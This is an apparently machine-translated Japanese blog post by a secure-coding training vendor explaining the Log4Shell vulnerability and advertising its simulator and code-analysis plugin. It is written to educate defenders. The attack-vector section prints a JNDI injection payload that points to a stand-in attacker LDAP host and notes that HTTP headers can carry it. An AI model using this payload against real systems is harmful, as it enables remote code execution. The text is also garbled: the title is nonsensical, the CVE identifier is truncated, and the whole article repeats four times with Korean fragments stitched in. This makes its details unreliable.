Log4jの近親相-v788とその近く
12月9日、JavaライブラリLog4jのゼロデイエクスプロイトが公開されました。 CVE-4428、吹き替え ログ 4 シェル、このエクスプロイトによりリモートでコードが実行される可能性があるため、「重大度高」という評価を受けました(レース)。さらに、log4j-core は最も一般的な Java ロギングライブラリの 1 つであるため、何百万ものアプリケーションが危険にさらされます。
Log4Shellに取り組むスキルをすばやくレベルアップしたいですか?
Log4Shellの基本的な考え方から、Missionと呼ばれるシミュレーターでこの脆弱性の悪用を体験できるショーケースを構築しました。このミッションでは、Log4j の脆弱性がインフラストラクチャーやアプリケーションにどのように影響するかを順を追って説明します。 ショーケースに直接移動するには、ここをクリックしてくださいまたは、引き続き読み進めて脆弱性の詳細を確認してください。
古いニュース?
このエクスプロイトは新しいものではありません。セキュリティ研究者は 2016 年の BlackHat トークですでに発表しています。 アルバロ・ムニョスとオレクサンドル・ミロシュ それを強調しました。」アプリケーションでは、信頼できないデータを使用して JNDI ルックアップを実行すべきではありません」と、ターゲットを絞ったJNDI/LDAPインジェクションがどのようにリモートコード実行につながるかを説明しました。そして、これこそまさに Log4Shell の中核にあるものです。
攻撃ベクトル
Log4Shell のインジェクションペイロードは次のようになります。
$ {jndi: ldap: //attacker.host/xyz}
これを理解するには、Java の表現言語 (EL) について知る必要があります。次の構文で記述された式: $ {expr} 実行時に評価されます。たとえば、$ {java: version} は使用されている Java バージョンを返します。
次に、JNDI、または Java ネーミングとディレクトリインターフェイスは、LDAP、DNS、RMI などのプロトコルを使用してサービスに接続し、データまたはリソースを取得できるようにする API です。簡単に言うと、前述の悪意のあるペイロードの例では、JNDI は攻撃者が制御する LDAP サーバーを検索します。たとえば、その応答が悪意のあるコードを含む Java クラスファイルを指していて、そのコードが脆弱なサーバー上で実行されてしまう可能性があります。
この脆弱性が大きな問題となっているのは、Log4j がすべてのログエントリを評価し、「jndi」というプレフィックスが付いた EL 構文で記述されたすべてのログユーザー入力を検索するためです。ペイロードは、フォームフィールドなど、ユーザーがデータを入力できる場所ならどこにでも挿入できます。また、次のような HTTP ヘッダーもあります。 ユーザーエージェント そして X-Forwarded-For、およびその他のヘッダーは、ペイロードを伝送するようにカスタマイズできます。
このエクスプロイトを自分で体験するには、 ショーケースに進み、ステップ2「エクスペリエンス・インパクト」に飛び込んでください。
予防:意識
Log4jは脆弱なコードにパッチを当てているため、アップグレードはすべてのアプリケーションに推奨されます。ただし、バージョン 2.15.0 と 2.16.0 には DDoS やその他の脆弱性が含まれていたため、12 月下旬の時点で 2.17.0 へのアップグレードが推奨されています。
コードを書く開発者は、常にセキュリティを考慮する必要があります。Log4Shell は、サードパーティのフレームワークやライブラリを使用するときにはリスクが伴うことを教えてくれました。私たちは、単純に安全だと思い込んでいる外部ソースを使うことで、アプリケーションのセキュリティが危険にさらされる可能性があることを認識しておく必要があります。
この脆弱性を防ぐことはできましたか?はい、いいえ。一方で、開発者ができることは脆弱なコンポーネントがサードパーティのソフトウェアから導入されている場合に限られます。一方、このことから学んだ教訓は何度も繰り返されてきたものです。つまり、ユーザーの入力を決して信用しないということです。
Secure Code Warriorは、セキュリティ志向の開発者がコードの脆弱性を防ぐ最善の方法であると考えています。SCW はプログラミングフレームワークに特化したトレーニングを大規模に提供しているため、企業のお客様は、レポートデータを利用することで、影響を受けた Java 開発者を迅速に特定できるようになりました。また、Log4j のアップグレードを加速させるために、SCW のトレーニングを受けたセキュリティチャンピオンに頼っていました。
特にJava開発者のために、セキュア・コード・ウォリアーは無料のIntelliJプラグインであるSenseiを提供しています。このルールベースのコード分析ツールを使用すると、コーディングガイドラインを適用したり、脆弱性を防いだり修正したりできます。独自のルールを作成することも、既製のルールを使用することもできます。 クックブック。当社を閲覧してください レシピ、そして私たちのダウンロードを忘れないでください Log4j クックブック これにより、Log4Shellの脆弱性を瞬時に見つけて修正できます。
Log4Shell に対する防御のスキルをレベルアップさせましょう
このブログ投稿で学んだことを実践することに興味がありますか?私たちのショーケースが役に立ちます。ショーケースの開始時に、この脆弱性を簡単に確認した後、シミュレートされた環境に移動し、ガイド付きの指示に従ってエクスプロイトを試してみることができます。
Secure Code Warrior는 소프트웨어 개발 라이프사이클 전반에 걸쳐 코드를 보호하고 사이버보안을 최우선으로 하는 문화를 구축하는 데 도움을 드립니다. 애플리케이션 보안 관리자, 개발자, CISO 또는 보안 담당자이든, 안전하지 않은 코드와 관련된 위험을 줄이는 데 도움을 드립니다.
데모 예약
로라 베르헤이데는 Secure Code Warrior의 소프트웨어 개발자로, 미션 랩과 코딩 랩을 위한 취약점 조사 및 콘텐츠 제작에 주력하고 있습니다.
12月9日、JavaライブラリLog4jのゼロデイエクスプロイトが公開されました。 CVE-4428、吹き替え ログ 4 シェル、このエクスプロイトによりリモートでコードが実行される可能性があるため、「重大度高」という評価を受けました(レース)。さらに、log4j-core は最も一般的な Java ロギングライブラリの 1 つであるため、何百万ものアプリケーションが危険にさらされます。
Log4Shellに取り組むスキルをすばやくレベルアップしたいですか?
Log4Shellの基本的な考え方から、Missionと呼ばれるシミュレーターでこの脆弱性の悪用を体験できるショーケースを構築しました。このミッションでは、Log4j の脆弱性がインフラストラクチャーやアプリケーションにどのように影響するかを順を追って説明します。 ショーケースに直接移動するには、ここをクリックしてくださいまたは、引き続き読み進めて脆弱性の詳細を確認してください。
古いニュース?
このエクスプロイトは新しいものではありません。セキュリティ研究者は 2016 年の BlackHat トークですでに発表しています。 アルバロ・ムニョスとオレクサンドル・ミロシュ それを強調しました。」アプリケーションでは、信頼できないデータを使用して JNDI ルックアップを実行すべきではありません」と、ターゲットを絞ったJNDI/LDAPインジェクションがどのようにリモートコード実行につながるかを説明しました。そして、これこそまさに Log4Shell の中核にあるものです。
攻撃ベクトル
Log4Shell のインジェクションペイロードは次のようになります。
$ {jndi: ldap: //attacker.host/xyz}
これを理解するには、Java の表現言語 (EL) について知る必要があります。次の構文で記述された式: $ {expr} 実行時に評価されます。たとえば、$ {java: version} は使用されている Java バージョンを返します。
次に、JNDI、または Java ネーミングとディレクトリインターフェイスは、LDAP、DNS、RMI などのプロトコルを使用してサービスに接続し、データまたはリソースを取得できるようにする API です。簡単に言うと、前述の悪意のあるペイロードの例では、JNDI は攻撃者が制御する LDAP サーバーを検索します。たとえば、その応答が悪意のあるコードを含む Java クラスファイルを指していて、そのコードが脆弱なサーバー上で実行されてしまう可能性があります。
この脆弱性が大きな問題となっているのは、Log4j がすべてのログエントリを評価し、「jndi」というプレフィックスが付いた EL 構文で記述されたすべてのログユーザー入力を検索するためです。ペイロードは、フォームフィールドなど、ユーザーがデータを入力できる場所ならどこにでも挿入できます。また、次のような HTTP ヘッダーもあります。 ユーザーエージェント そして X-Forwarded-For、およびその他のヘッダーは、ペイロードを伝送するようにカスタマイズできます。
このエクスプロイトを自分で体験するには、 ショーケースに進み、ステップ2「エクスペリエンス・インパクト」に飛び込んでください。
予防:意識
Log4jは脆弱なコードにパッチを当てているため、アップグレードはすべてのアプリケーションに推奨されます。ただし、バージョン 2.15.0 と 2.16.0 には DDoS やその他の脆弱性が含まれていたため、12 月下旬の時点で 2.17.0 へのアップグレードが推奨されています。
コードを書く開発者は、常にセキュリティを考慮する必要があります。Log4Shell は、サードパーティのフレームワークやライブラリを使用するときにはリスクが伴うことを教えてくれました。私たちは、単純に安全だと思い込んでいる外部ソースを使うことで、アプリケーションのセキュリティが危険にさらされる可能性があることを認識しておく必要があります。
この脆弱性を防ぐことはできましたか?はい、いいえ。一方で、開発者ができることは脆弱なコンポーネントがサードパーティのソフトウェアから導入されている場合に限られます。一方、このことから学んだ教訓は何度も繰り返されてきたものです。つまり、ユーザーの入力を決して信用しないということです。
Secure Code Warriorは、セキュリティ志向の開発者がコードの脆弱性を防ぐ最善の方法であると考えています。SCW はプログラミングフレームワークに特化したトレーニングを大規模に提供しているため、企業のお客様は、レポートデータを利用することで、影響を受けた Java 開発者を迅速に特定できるようになりました。また、Log4j のアップグレードを加速させるために、SCW のトレーニングを受けたセキュリティチャンピオンに頼っていました。
特にJava開発者のために、セキュア・コード・ウォリアーは無料のIntelliJプラグインであるSenseiを提供しています。このルールベースのコード分析ツールを使用すると、コーディングガイドラインを適用したり、脆弱性を防いだり修正したりできます。独自のルールを作成することも、既製のルールを使用することもできます。 クックブック。当社を閲覧してください レシピ、そして私たちのダウンロードを忘れないでください Log4j クックブック これにより、Log4Shellの脆弱性を瞬時に見つけて修正できます。
Log4Shell に対する防御のスキルをレベルアップさせましょう
このブログ投稿で学んだことを実践することに興味がありますか?私たちのショーケースが役に立ちます。ショーケースの開始時に、この脆弱性を簡単に確認した後、シミュレートされた環境に移動し、ガイド付きの指示に従ってエクスプロイトを試してみることができます。
12月9日、JavaライブラリLog4jのゼロデイエクスプロイトが公開されました。 CVE-4428、吹き替え ログ 4 シェル、このエクスプロイトによりリモートでコードが実行される可能性があるため、「重大度高」という評価を受けました(レース)。さらに、log4j-core は最も一般的な Java ロギングライブラリの 1 つであるため、何百万ものアプリケーションが危険にさらされます。
Log4Shellに取り組むスキルをすばやくレベルアップしたいですか?
Log4Shellの基本的な考え方から、Missionと呼ばれるシミュレーターでこの脆弱性の悪用を体験できるショーケースを構築しました。このミッションでは、Log4j の脆弱性がインフラストラクチャーやアプリケーションにどのように影響するかを順を追って説明します。 ショーケースに直接移動するには、ここをクリックしてくださいまたは、引き続き読み進めて脆弱性の詳細を確認してください。
古いニュース?
このエクスプロイトは新しいものではありません。セキュリティ研究者は 2016 年の BlackHat トークですでに発表しています。 アルバロ・ムニョスとオレクサンドル・ミロシュ それを強調しました。」アプリケーションでは、信頼できないデータを使用して JNDI ルックアップを実行すべきではありません」と、ターゲットを絞ったJNDI/LDAPインジェクションがどのようにリモートコード実行につながるかを説明しました。そして、これこそまさに Log4Shell の中核にあるものです。
攻撃ベクトル
Log4Shell のインジェクションペイロードは次のようになります。
$ {jndi: ldap: //attacker.host/xyz}
これを理解するには、Java の表現言語 (EL) について知る必要があります。次の構文で記述された式: $ {expr} 実行時に評価されます。たとえば、$ {java: version} は使用されている Java バージョンを返します。
次に、JNDI、または Java ネーミングとディレクトリインターフェイスは、LDAP、DNS、RMI などのプロトコルを使用してサービスに接続し、データまたはリソースを取得できるようにする API です。簡単に言うと、前述の悪意のあるペイロードの例では、JNDI は攻撃者が制御する LDAP サーバーを検索します。たとえば、その応答が悪意のあるコードを含む Java クラスファイルを指していて、そのコードが脆弱なサーバー上で実行されてしまう可能性があります。
この脆弱性が大きな問題となっているのは、Log4j がすべてのログエントリを評価し、「jndi」というプレフィックスが付いた EL 構文で記述されたすべてのログユーザー入力を検索するためです。ペイロードは、フォームフィールドなど、ユーザーがデータを入力できる場所ならどこにでも挿入できます。また、次のような HTTP ヘッダーもあります。 ユーザーエージェント そして X-Forwarded-For、およびその他のヘッダーは、ペイロードを伝送するようにカスタマイズできます。
このエクスプロイトを自分で体験するには、 ショーケースに進み、ステップ2「エクスペリエンス・インパクト」に飛び込んでください。
予防:意識
Log4jは脆弱なコードにパッチを当てているため、アップグレードはすべてのアプリケーションに推奨されます。ただし、バージョン 2.15.0 と 2.16.0 には DDoS やその他の脆弱性が含まれていたため、12 月下旬の時点で 2.17.0 へのアップグレードが推奨されています。
コードを書く開発者は、常にセキュリティを考慮する必要があります。Log4Shell は、サードパーティのフレームワークやライブラリを使用するときにはリスクが伴うことを教えてくれました。私たちは、単純に安全だと思い込んでいる外部ソースを使うことで、アプリケーションのセキュリティが危険にさらされる可能性があることを認識しておく必要があります。
この脆弱性を防ぐことはできましたか?はい、いいえ。一方で、開発者ができることは脆弱なコンポーネントがサードパーティのソフトウェアから導入されている場合に限られます。一方、このことから学んだ教訓は何度も繰り返されてきたものです。つまり、ユーザーの入力を決して信用しないということです。
Secure Code Warriorは、セキュリティ志向の開発者がコードの脆弱性を防ぐ最善の方法であると考えています。SCW はプログラミングフレームワークに特化したトレーニングを大規模に提供しているため、企業のお客様は、レポートデータを利用することで、影響を受けた Java 開発者を迅速に特定できるようになりました。また、Log4j のアップグレードを加速させるために、SCW のトレーニングを受けたセキュリティチャンピオンに頼っていました。
特にJava開発者のために、セキュア・コード・ウォリアーは無料のIntelliJプラグインであるSenseiを提供しています。このルールベースのコード分析ツールを使用すると、コーディングガイドラインを適用したり、脆弱性を防いだり修正したりできます。独自のルールを作成することも、既製のルールを使用することもできます。 クックブック。当社を閲覧してください レシピ、そして私たちのダウンロードを忘れないでください Log4j クックブック これにより、Log4Shellの脆弱性を瞬時に見つけて修正できます。
Log4Shell に対する防御のスキルをレベルアップさせましょう
このブログ投稿で学んだことを実践することに興味がありますか?私たちのショーケースが役に立ちます。ショーケースの開始時に、この脆弱性を簡単に確認した後、シミュレートされた環境に移動し、ガイド付きの指示に従ってエクスプロイトを試してみることができます。
아래 링크를 클릭하여 이 자료의 PDF를 다운로드하십시오.
Secure Code Warrior는 소프트웨어 개발 라이프사이클 전반에 걸쳐 코드를 보호하고 사이버보안을 최우선으로 하는 문화를 구축하는 데 도움을 드립니다. 애플리케이션 보안 관리자, 개발자, CISO 또는 보안 담당자이든, 안전하지 않은 코드와 관련된 위험을 줄이는 데 도움을 드립니다.
보고서 표시데모 예약
로라 베르헤이데는 Secure Code Warrior의 소프트웨어 개발자로, 미션 랩과 코딩 랩을 위한 취약점 조사 및 콘텐츠 제작에 주력하고 있습니다.
12月9日、JavaライブラリLog4jのゼロデイエクスプロイトが公開されました。 CVE-4428、吹き替え ログ 4 シェル、このエクスプロイトによりリモートでコードが実行される可能性があるため、「重大度高」という評価を受けました(レース)。さらに、log4j-core は最も一般的な Java ロギングライブラリの 1 つであるため、何百万ものアプリケーションが危険にさらされます。
Log4Shellに取り組むスキルをすばやくレベルアップしたいですか?
Log4Shellの基本的な考え方から、Missionと呼ばれるシミュレーターでこの脆弱性の悪用を体験できるショーケースを構築しました。このミッションでは、Log4j の脆弱性がインフラストラクチャーやアプリケーションにどのように影響するかを順を追って説明します。 ショーケースに直接移動するには、ここをクリックしてくださいまたは、引き続き読み進めて脆弱性の詳細を確認してください。
古いニュース?
このエクスプロイトは新しいものではありません。セキュリティ研究者は 2016 年の BlackHat トークですでに発表しています。 アルバロ・ムニョスとオレクサンドル・ミロシュ それを強調しました。」アプリケーションでは、信頼できないデータを使用して JNDI ルックアップを実行すべきではありません」と、ターゲットを絞ったJNDI/LDAPインジェクションがどのようにリモートコード実行につながるかを説明しました。そして、これこそまさに Log4Shell の中核にあるものです。
攻撃ベクトル
Log4Shell のインジェクションペイロードは次のようになります。
$ {jndi: ldap: //attacker.host/xyz}
これを理解するには、Java の表現言語 (EL) について知る必要があります。次の構文で記述された式: $ {expr} 実行時に評価されます。たとえば、$ {java: version} は使用されている Java バージョンを返します。
次に、JNDI、または Java ネーミングとディレクトリインターフェイスは、LDAP、DNS、RMI などのプロトコルを使用してサービスに接続し、データまたはリソースを取得できるようにする API です。簡単に言うと、前述の悪意のあるペイロードの例では、JNDI は攻撃者が制御する LDAP サーバーを検索します。たとえば、その応答が悪意のあるコードを含む Java クラスファイルを指していて、そのコードが脆弱なサーバー上で実行されてしまう可能性があります。
この脆弱性が大きな問題となっているのは、Log4j がすべてのログエントリを評価し、「jndi」というプレフィックスが付いた EL 構文で記述されたすべてのログユーザー入力を検索するためです。ペイロードは、フォームフィールドなど、ユーザーがデータを入力できる場所ならどこにでも挿入できます。また、次のような HTTP ヘッダーもあります。 ユーザーエージェント そして X-Forwarded-For、およびその他のヘッダーは、ペイロードを伝送するようにカスタマイズできます。
このエクスプロイトを自分で体験するには、 ショーケースに進み、ステップ2「エクスペリエンス・インパクト」に飛び込んでください。
予防:意識
Log4jは脆弱なコードにパッチを当てているため、アップグレードはすべてのアプリケーションに推奨されます。ただし、バージョン 2.15.0 と 2.16.0 には DDoS やその他の脆弱性が含まれていたため、12 月下旬の時点で 2.17.0 へのアップグレードが推奨されています。
コードを書く開発者は、常にセキュリティを考慮する必要があります。Log4Shell は、サードパーティのフレームワークやライブラリを使用するときにはリスクが伴うことを教えてくれました。私たちは、単純に安全だと思い込んでいる外部ソースを使うことで、アプリケーションのセキュリティが危険にさらされる可能性があることを認識しておく必要があります。
この脆弱性を防ぐことはできましたか?はい、いいえ。一方で、開発者ができることは脆弱なコンポーネントがサードパーティのソフトウェアから導入されている場合に限られます。一方、このことから学んだ教訓は何度も繰り返されてきたものです。つまり、ユーザーの入力を決して信用しないということです。
Secure Code Warriorは、セキュリティ志向の開発者がコードの脆弱性を防ぐ最善の方法であると考えています。SCW はプログラミングフレームワークに特化したトレーニングを大規模に提供しているため、企業のお客様は、レポートデータを利用することで、影響を受けた Java 開発者を迅速に特定できるようになりました。また、Log4j のアップグレードを加速させるために、SCW のトレーニングを受けたセキュリティチャンピオンに頼っていました。
特にJava開発者のために、セキュア・コード・ウォリアーは無料のIntelliJプラグインであるSenseiを提供しています。このルールベースのコード分析ツールを使用すると、コーディングガイドラインを適用したり、脆弱性を防いだり修正したりできます。独自のルールを作成することも、既製のルールを使用することもできます。 クックブック。当社を閲覧してください レシピ、そして私たちのダウンロードを忘れないでください Log4j クックブック これにより、Log4Shellの脆弱性を瞬時に見つけて修正できます。
Log4Shell に対する防御のスキルをレベルアップさせましょう
このブログ投稿で学んだことを実践することに興味がありますか?私たちのショーケースが役に立ちます。ショーケースの開始時に、この脆弱性を簡単に確認した後、シミュレートされた環境に移動し、ガイド付きの指示に従ってエクスプロイトを試してみることができます。
%20(1).avif)
.avif)
